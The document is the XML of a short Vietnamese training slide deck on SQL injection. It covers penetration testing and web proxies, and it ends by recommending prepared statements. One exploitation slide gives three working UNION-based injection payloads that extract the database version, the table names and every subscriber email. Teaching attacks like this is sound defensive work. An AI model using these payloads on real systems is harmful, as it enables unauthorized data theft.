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394063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C6377-18B6-4D43-B18D-A9F1C1099EF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58406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156325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83367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1969993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3535876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217784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130278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282625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240391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C6377-18B6-4D43-B18D-A9F1C1099EF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10921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C6377-18B6-4D43-B18D-A9F1C1099EF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199555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C6377-18B6-4D43-B18D-A9F1C1099EFD}"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224884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C6377-18B6-4D43-B18D-A9F1C1099EFD}"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32495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C6377-18B6-4D43-B18D-A9F1C1099EFD}"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367379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C6377-18B6-4D43-B18D-A9F1C1099EF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107243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C6377-18B6-4D43-B18D-A9F1C1099EF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9DC44-25A2-4066-AD76-30D6A3112F00}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="265173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7C6377-18B6-4D43-B18D-A9F1C1099EFD}"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89DC44-25A2-4066-AD76-30D6A3112F00}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18026218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A955-6CE6-4924-AB7C-5EAB24B2ABE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SQL Injection</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1C5EE61F-AEE0-4658-9994-278846F45FA9}"/>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307391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7017-AC25-41F5-ADC1-44344F6E858A}"/>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079BE9D7-1989-4428-B251-EC4FF2812860}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484310" y="2438399"/>
            <a:ext cx="10018713" cy="3352801"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>Kiểm tra thâm nhập còn được gọi là kiểm tra bút hoặc hack đạo đức là thực hành kiểm tra hệ thống máy tính, mạng hoặc ứng dụng web để tìm ra các lỗ hổng bảo mật mà kẻ tấn công có thể khai thác.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>Web proxy, còn được gọi là proxy HTTP là một công cụ gỡ lỗi phần mềm cho phép các nhà phát triển web xem và sửa đổi lưu lượng HTTP và HTTPS thô giữa máy của họ và một ứng dụng web từ xa. Điều này có thể bao gồm dữ liệu phản hồi và yêu cầu HTTP / HTTPS, tham số yêu cầu, tiêu đề, v.v.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189335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102F-5F12-4BAE-9E55-DFBE29F0E4FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Khai thác </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DE180F8-B42F-4822-9006-088293EEBA7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Payload :bob@livemail.com' UNION ALL SELECT concat_ws(0x3a, version(), user(), database())--    &gt;&gt; lấy ra phiên bản , user và database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Payload : bob@livemail.com' UNION ALL SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema=database()—</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&gt;&gt; lấy ra tên bảng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Payload: bob@livemail.com' UNION ALL SELECT email FROM carvibe_subscribers--    &gt;&gt; lấy ra tất cả email từ bảng trên .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83819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C341-454C-4051-AB1D-99292981C229}"/>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57D54AFC-4465-4678-B6D0-B69DA4C57992}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>Để giảm thiểu hiệu quả các cuộc tấn công SQL Injection, các nhà phát triển phải sử dụng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="61BD6D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>prepared statements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="8A9CD1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>(còn được gọi là các truy vấn được tham số hóa) khi xây dựng các truy vấn SQL dựa trên đầu vào của người dùng. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="61BD6D"/>
                </a:solidFill>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="61BD6D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>repared statements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="8A9CD1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>ngăn chặn các cuộc tấn công SQL Injection bằng cách xác định các biến giữ chỗ để chuyển các tham số bên trong một câu lệnh SQL một cách an toàn, các tham số này sẽ tự động được thoát khi chạy. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1906698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46</TotalTime>
  <Words>319</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SQL Injection </vt:lpstr>
      <vt:lpstr>Tổng quan</vt:lpstr>
      <vt:lpstr>Khai thác </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dc:title>
  <dc:creator>Pham Duy Chien (FIS CSD HN)</dc:creator>
  <cp:lastModifiedBy>Pham Duy Chien (FIS CSD HN)</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-25T14:49:42Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-26T02:41:11Z</dcterms:modified>
</cp:coreProperties>
</file>